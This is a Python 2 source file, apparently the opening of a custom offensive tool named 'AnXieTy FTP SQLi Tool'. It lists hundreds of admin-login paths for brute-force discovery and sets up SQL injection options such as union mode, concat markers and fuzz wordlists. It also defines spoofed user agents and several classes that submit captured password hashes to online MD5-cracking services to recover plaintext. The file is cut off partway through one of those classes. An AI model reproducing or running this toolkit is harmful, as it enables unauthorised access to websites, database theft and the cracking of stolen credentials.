AnXieTy FTP SQLi ~Tool~ Custom

1. try:
2.     from time import gmtime, strftime
3.     import urllib, sys, re, os, socket, httplib, urllib2, time, random
4.     import hashlib
5.     import urllib2
6.     import getopt
7.     from os import path
8.     from urllib import urlencode
9.     from re import search, findall
10.     from random import seed, randint
11.     from base64 import decodestring, encodestring
12.     from cookielib import LWPCookieJar
13. except ImportError:
14.     print """
15. Execution Error:
16.  
17.  You required some basic Python libraries.
18.  
19.  This application use: sys, hashlib, urllib, urllib2, os, re, random, getopt, base64 , socket, httplib, time, random  and cookielib.
20.  
21.  Please, check if you have all of them installed in your system.
22.  
23. """
24.     sys.exit(1)
25.  
26.  
27. php = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
28. 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
29. 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
30. 'admin_area/index.php','articles/connexion.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
31. 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
32. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
33. 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
34. 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
35. 'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
36. 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
37. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
38. 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
39. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
40. 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
41. 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
42. 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
43. 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
44. 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
45. 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php']
46.  
47. jerar=[]
48. MD4 = "md4"
49. MD5     = "md5"
50. SHA1    = "sha1"
51. SHA224  = "sha224"
52. SHA256  = "sha256"
53. SHA384  = "sha384"
54. SHA512  = "sha512"
55. RIPEMD  = "rmd160"
56. LM  = "lm"
57. NTLM    = "ntlm"
58. MYSQL   = "mysql"
59. CISCO7  = "cisco7"
60. JUNIPER = "juniper"
61. GOST    = "gost"
62. a=0
63. cgi = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
64. 'memberadmin/','administratorlogin/','adm/','admin/account.cgi','admin/index.cgi','admin/login.cgi','admin/admin.cgi','admin/account.cgi',
65. 'admin_area/admin.cgi','admin_area/login.cgi','siteadmin/login.cgi','siteadmin/index.cgi','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
66. 'admin_area/index.cgi','bb-admin/index.cgi','bb-admin/login.cgi','bb-admin/admin.cgi','admin/home.cgi','admin_area/login.html','admin_area/index.html',
67. 'admin/controlpanel.cgi','admin.cgi','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
68. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
69. 'admin/cp.cgi','cp.cgi','administrator/index.cgi','administrator/login.cgi','nsw/admin/login.cgi','webadmin/login.cgi','admin/admin_login.cgi','admin_login.cgi',
70. 'administrator/account.cgi','administrator.cgi','admin_area/admin.html','pages/admin/admin-login.cgi','admin/admin-login.cgi','admin-login.cgi',
71. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cgi','modelsearch/login.cgi','moderator.cgi','moderator/login.cgi',
72. 'moderator/admin.cgi','account.cgi','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cgi','admincontrol.cgi',
73. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cgi','adminarea/index.html','adminarea/admin.html',
74. 'webadmin.cgi','webadmin/index.cgi','acceso.cgi','webadmin/admin.cgi','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cgi','moderator.html',
75. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
76. 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
77. 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cgi','account.html','controlpanel.html','admincontrol.html',
78. 'panel-administracion/login.cgi','wp-login.cgi','adminLogin.cgi','admin/adminLogin.cgi','home.cgi','admin.cgi','adminarea/index.cgi',
79. 'adminarea/admin.cgi','adminarea/login.cgi','panel-administracion/index.cgi','panel-administracion/admin.cgi','modelsearch/index.cgi',
80. 'modelsearch/admin.cgi','admincontrol/login.cgi','adm/admloginuser.cgi','admloginuser.cgi','admin2.cgi','admin2/login.cgi','admin2/index.cgi','usuarios/login.cgi',
81. 'adm/index.cgi','adm.cgi','affiliate.cgi','adm_auth.cgi','memberadmin.cgi','administratorlogin.cgi']
82. var1=0
83. var2=0
84. WHIRLPOOL = "whirlpool"
85. LDAP_MD5 = "ldap_md5"
86. LDAP_SHA1 = "ldap_sha1"
87. hashvalue = None
88. hashfile  = None
89. googlesearch = False
90. arg_end = "--"
91. arg_eva = "+"
92. colMax = 200
93. hash = ''
94. brf = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
95. 'memberadmin/','administratorlogin/','adm/','admin/account.brf','admin/index.brf','admin/login.brf','admin/admin.brf','admin/account.brf',
96. 'admin_area/admin.brf','admin_area/login.brf','siteadmin/login.brf','siteadmin/index.brf','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
97. 'admin_area/index.brf','bb-admin/index.brf','bb-admin/login.brf','bb-admin/admin.brf','admin/home.brf','admin_area/login.html','admin_area/index.html',
98. 'admin/controlpanel.brf','admin.brf','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
99. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
100. 'admin/cp.brf','cp.brf','administrator/index.brf','administrator/login.brf','nsw/admin/login.brf','webadmin/login.brfbrf','admin/admin_login.brf','admin_login.brf',
101. 'administrator/account.brf','administrator.brf','acceso.brf','admin_area/admin.html','pages/admin/admin-login.brf','admin/admin-login.brf','admin-login.brf',
102. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.brf','modelsearch/login.brf','moderator.brf','moderator/login.brf',
103. 'moderator/admin.brf','account.brf','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.brf','admincontrol.brf',
104. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.brf','adminarea/index.html','adminarea/admin.html',
105. 'webadmin.brf','webadmin/index.brf','webadmin/admin.brf','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.brf','moderator.html',
106. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
107. 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
108. 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.brf','account.html','controlpanel.html','admincontrol.html',
109. 'panel-administracion/login.brf','wp-login.brf','adminLogin.brf','admin/adminLogin.brf','home.brf','admin.brf','adminarea/index.brf',
110. 'adminarea/admin.brf','adminarea/login.brf','panel-administracion/index.brf','panel-administracion/admin.brf','modelsearch/index.brf',
111. 'modelsearch/admin.brf','admincontrol/login.brf','adm/admloginuser.brf','admloginuser.brf','admin2.brf','admin2/login.brf','admin2/index.brf','usuarios/login.brf',
112. 'adm/index.brf','adm.brf','affiliate.brf','adm_auth.brf','memberadmin.brf','administratorlogin.brf']
113.  
114. socket.setdefaulttimeout(10)
115. logfile = "PRO_INJECTOR.log"
116. tablefuzz = "tablesfuzz.txt"
117. columnfuzz = "columnsfuzz.txt"
118. loadfilefuzz = "loadfilefuzz.txt"
119.  
120. asp = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
121. 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
122. 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
123. 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
124. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
125. 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
126. 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
127. 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
128. 'administrator/account.asp','administrator.asp','acceso.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
129. 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
130. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
131. 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
132. 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
133. 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
134. 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
135. 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
136. 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
137. 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
138. 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html']
139.  
140. algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"}
141.  
142. USER_AGENTS = [
143.     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 1.0.5)",
144.     "curl/7.7.2 (powerpc-apple-darwin6.0) libcurl 7.7.2 (OpenSSL 0.9.6b)",
145.     "Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
146.     "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101213 Firefox/4.0b8pre",
147.     "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)",
148.     "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)",
149.     "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) chromeframe/10.0.648.205",
150.     "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)",
151.     "Opera/9.80 (Windows NT 6.1; U; sv) Presto/2.7.62 Version/11.01",
152.     "Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00",
153.     "Opera/9.80 (X11; Linux i686; U; pl) Presto/2.6.30 Version/10.61",
154.     "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2",
155.     "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2",
156.     "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.812.0 Safari/535.1",
157.     "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
158.     ]
159.  
160. cfm = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
161. 'memberadmin/','administratorlogin/','adm/','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm','admin/account.cfm',
162. 'admin_area/admin.cfm','admin_area/login.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
163. 'admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin_area/login.html','admin_area/index.html',
164. 'admin/controlpanel.cfm','admin.cfm','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
165. 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
166. 'admin/cp.cfm','cp.cfm','administrator/index.cfm','administrator/login.cfm','nsw/admin/login.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm',
167. 'administrator/account.cfm','administrator.cfm','admin_area/admin.html','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm',
168. 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm',
169. 'moderator/admin.cfm','account.cfm','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cfm','admincontrol.cfm',
170. 'admin/adminLogin.html','acceso.cfm','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cfm','adminarea/index.html','adminarea/admin.html',
171. 'webadmin.cfm','webadmin/index.cfm','webadmin/admin.cfm','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cfm','moderator.html',
172. 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
173. 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
174. 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cfm','account.html','controlpanel.html','admincontrol.html',
175. 'panel-administracion/login.cfm','wp-login.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm',
176. 'adminarea/admin.cfm','adminarea/login.cfm','panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm',
177. 'modelsearch/admin.cfm','admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','usuarios/login.cfm',
178. 'adm/index.cfm','adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm']
179. RebelG=[]
180. site = ""
181. proxy = "None"
182. arg_string = ""
183. arg_blind = "--union"
184. arg_table = "None"
185. arg_database = "None"
186. arg_columns = "None"
187. arg_row = "Rows"
188. arg_cookie = "None"
189. arg_insert = "None"
190. arg_where = ""
191. arg_orderby = ""
192. arg_debug = "off"
193. arg_rowdisp = 1
194. arg_adminusers = 10
195. arg_wordlist = ""
196. arg_ssl = "off"
197. arg_proxy_auth = ""
198. MECA = "concat(0x1e,0x1e,"
199. mode = "None"
200. lower_bound = 0
201. upper_bound = 16069
202. line_URL = ""
203. count_URL = ""
204. cur_db = ""
205. cur_table = ""
206. terminal = ""
207. count = 0
208. gets = 0
209. table_num = 0
210. num = 0
211. ser_ver = 3
212. version =[]
213. let_pos = 1
214. lim_num = 0
215. agent = ""
216. ip = ""
217. Dork = ''
218.  
219. class SCHWETT:
220.    
221.     name =      "schwett"
222.     url =       "http://schwett.com"
223.     supported_algorithm = [MD5]
224.    
225.     def isSupported (self, alg):
226.        
227.        
228.         if alg in self.supported_algorithm:
229.             return True
230.         else:
231.             return False
232.  
233.  
234.     def crack (self, hashvalue, alg):
235.        
236.        
237.         if not self.isSupported (alg):
238.             return None
239.        
240.         url = "http://schwett.com/md5/index.php?md5value=%s&md5c=Hash+Match" % (hashvalue)
241.        
242.         response = do_HTTP_request ( url )
243.        
244.         html = None
245.         if response:
246.             html = response.read()
247.         else:
248.             return None
249.        
250.         match = search (r"<h3><font color='red'>No Match Found</font></h3><br />", html)
251.         if match:
252.             return None
253.         else:
254.             return "The hash is broken, please contact with La X marca el lugar and send it the hash value to add the correct regexp."
255.  
256.  
257. class NETMD5CRACK:
258.  
259.     name =      "netmd5crack"
260.     url =       "http://www.netmd5crack.com"
261.     supported_algorithm = [MD5]
262.    
263.     def isSupported (self, alg):
264.        
265.        
266.        
267.         if alg in self.supported_algorithm:
268.             return True
269.         else:
270.             return False
271.  
272.  
273.     def crack (self, hashvalue, alg):
274.        
275.        
276.        
277.        
278.         if not self.isSupported (alg):
279.             return None
280.        
281.         url = "http://www.netmd5crack.com/cgi-bin/Crack.py?InputHash=%s" % (hashvalue)
282.        
283.         response = do_HTTP_request ( url )
284.        
285.         html = None
286.         if response:
287.             html = response.read()
288.         else:
289.             return None
290.        
291.         regexp = r'<tr><td class="border">%s</td><td class="border">[^<]*</td></tr></table>' % (hashvalue)
292.         match = search (regexp, html)
293.        
294.         if match:
295.             match2 = search ( "Sorry, we don't have that hash in our database", match.group() )
296.             if match2:
297.                 return None
298.             else:
299.                 return match.group().split('border')[2].split('<')[0][2:]
300.  
301.  
302.  
303. class MD5_CRACKER:
304.    
305.     name =      "md5-cracker"
306.     url =       "http://www.md5-cracker.tk"
307.     supported_algorithm = [MD5]
308.    
309.     def isSupported (self, alg):
310.        
311.        
312.        
313.         if alg in self.supported_algorithm:
314.             return True
315.         else:
316.             return False
317.  
318.  
319.     def crack (self, hashvalue, alg):
320.        
321.        
322.        
323.        
324.        
325.         if not self.isSupported (alg):
326.             return None
327.        
328.        
329.         url = "http://www.md5-cracker.tk/xml.php?md5=%s" % (hashvalue)
330.        
331.        
332.         response = do_HTTP_request ( url )
333.        
334.        
335.         if response:
336.             try:
337.                 doc = parseDoc ( response.read() )
338.             except:
339.                 print "INFO: You need libxml2 to use this plugin."
340.                 return None
341.         else:
342.             return None
343.        
344.         result = doc.xpathEval("//data")
345.         if len(result):
346.             return result[0].content
347.         else:
348.             return None
349.  
350.  
351. class BENRAMSEY:
352.    
353.     name =      "benramsey"
354.     url =       "http://tools.benramsey.com"
355.     supported_algorithm = [MD5]
356.    
357.     def isSupported (self, alg):
358.        
359.        
360.        
361.         if alg in self.supported_algorithm:
362.             return True
363.         else:
364.             return False
365.  
366.  
367.     def crack (self, hashvalue, alg):
368.        
369.        
370.        
371.        
372.        
373.         if not self.isSupported (alg):
374.             return None
375.        
376.        
377.         url = "http://tools.benramsey.com/md5/md5.php?hash=%s" % (hashvalue)
378.        
379.        
380.         response = do_HTTP_request ( url )
381.        
382.        
383.         html = None
384.         if response:
385.             html = response.read()
386.         else:
387.             return None
388.            
389.         match = search (r'<string><!\[CDATA\[[^\]]*\]\]></string>', html)
390.        
391.         if match:
392.             return match.group().split(']')[0][17:]
393.         else:
394.             return None
395.  
396.  
397.  
398. class GROMWEB:
399.    
400.     name =      "gromweb"
401.     url =       "http://md5.gromweb.com"
402.     supported_algorithm = [MD5]
403.    
404.     def isSupported (self, alg):
405.        
406.        
407.        
408.         if alg in self.supported_algorithm:
409.             return True
410.         else:
411.             return False
412.  
413.  
414.     def crack (self, hashvalue, alg):
415.        
416.        
417.        
418.        
419.        
420.         if not self.isSupported (alg):
421.             return None
422.        
423.        
424.         url = "http://md5.gromweb.com/query/%s" % (hashvalue)
425.        
426.        
427.         response = do_HTTP_request ( url )
428.        
429.        
430.         if response:
431.             return response.read()
432.            
433.         return response
434.        
435.        
436.  
437.  
438. class HASHCRACKING:
439.    
440.     name =      "hashcracking"
441.     url =       "http://md5.hashcracking.com"
442.     supported_algorithm = [MD5]
443.    
444.     def isSupported (self, alg):
445.        
446.        
447.        
448.         if alg in self.supported_algorithm:
449.             return True
450.         else:
451.             return False
452.  
453.  
454.     def crack (self, hashvalue, alg):
455.        
456.        
457.        
458.        
459.        
460.         if not self.isSupported (alg):
461.             return None
462.        
463.        
464.         url = "http://md5.hashcracking.com/search.php?md5=%s" % (hashvalue)
465.        
466.        
467.         response = do_HTTP_request ( url )
468.        
469.        
470.         html = None
471.         if response:
472.             html = response.read()
473.         else:
474.             return None
475.        
476.         match = search (r'\sis.*', html)
477.        
478.         if match:
479.             return match.group()[4:]
480.            
481.         return None
482.  
483.  
484.  
485. class VICTOROV:
486.    
487.     name =      "hashcracking"
488.     url =       "http://victorov.su"
489.     supported_algorithm = [MD5]
490.    
491.     def isSupported (self, alg):
492.        
493.        
494.        
495.         if alg in self.supported_algorithm:
496.             return True
497.         else:
498.             return False
499.  
500.  
501.     def crack (self, hashvalue, alg):
502.        
503.        
504.        
505.        
506.        
507.         if not self.isSupported (alg):
508.             return None
509.        
510.        
511.         url = "http://victorov.su/md5/?md5e=&md5d=%s" % (hashvalue)
512.        
513.        
514.         response = do_HTTP_request ( url )
515.        
516.        
517.         html = None
518.         if response:
519.             html = response.read()
520.         else:
521.             return None
522.        
523.         match = search (r': <b>[^<]*</b><br><form action="">', html)
524.        
525.         if match:
526.             return match.group().split('b>')[1][:-2]
527.            
528.         return None
529.  
530.  
531. class THEKAINE:
532.    
533.     name =      "thekaine"
534.     url =       "http://md5.thekaine.de"
535.     supported_algorithm = [MD5]
536.    
537.     def isSupported (self, alg):
538.        
539.        
540.        
541.         if alg in self.supported_algorithm:
542.             return True
543.         else:
544.             return False
545.  
546.  
547.     def crack (self, hashvalue, alg):
548.        
549.        
550.        
551.        
552.        
553.         if not self.isSupported (alg):
554.             return None
555.        
556.        
557.         url = "http://md5.thekaine.de/?hash=%s" % (hashvalue)
558.        
559.        
560.         response = do_HTTP_request ( url )
561.        
562.        
563.         html = None
564.         if response:
565.             html = response.read()
566.         else:
567.             return None
568.        
569.         match = search (r'<td colspan="2"><br><br><b>[^<]*</b></td><td></td>', html)
570.        
571.         if match:
572.            
573.             match2 = search (r'not found', match.group() )
574.            
575.             if match2:
576.                 return None
577.             else:
578.                 return match.group().split('b>')[1][:-2]
579.            
580.  
581.  
582. class TMTO:
583.    
584.     name =      "tmto"
585.     url =       "http://www.tmto.org"
586.     supported_algorithm = [MD5]
587.    
588.     def isSupported (self, alg):
589.        
590.        
591.        
592.         if alg in self.supported_algorithm:
593.             return True
594.         else:
595.             return False
596.  
597.  
598.     def crack (self, hashvalue, alg):
599.        
600.        
601.        
602.        
603.        
604.         if not self.isSupported (alg):
605.             return None
606.        
607.        
608.         url = "http://www.tmto.org/api/latest/?hash=%s&auth=true" % (hashvalue)
609.        
610.        
611.         response = do_HTTP_request ( url )
612.        
613.        
614.         html = None
615.         if response:
616.             html = response.read()
617.         else:
618.             return None
619.        
620.         match = search (r'text="[^"]+"', html)
621.        
622.         if match:
623.             return decodestring(match.group().split('"')[1])
624.         else:
625.             return None
626.  
627.  
628. class MD5_DB:
629.    
630.     name =      "md5-db"
631.     url =       "http://md5-db.de"
632.     supported_algorithm = [MD5]
633.    
634.     def isSupported (self, alg):
635.        
636.        
637.        
638.         if alg in self.supported_algorithm:
639.             return True
640.         else:
641.             return False
642.  
643.  
644.     def crack (self, hashvalue, alg):
645.        
646.        
647.        
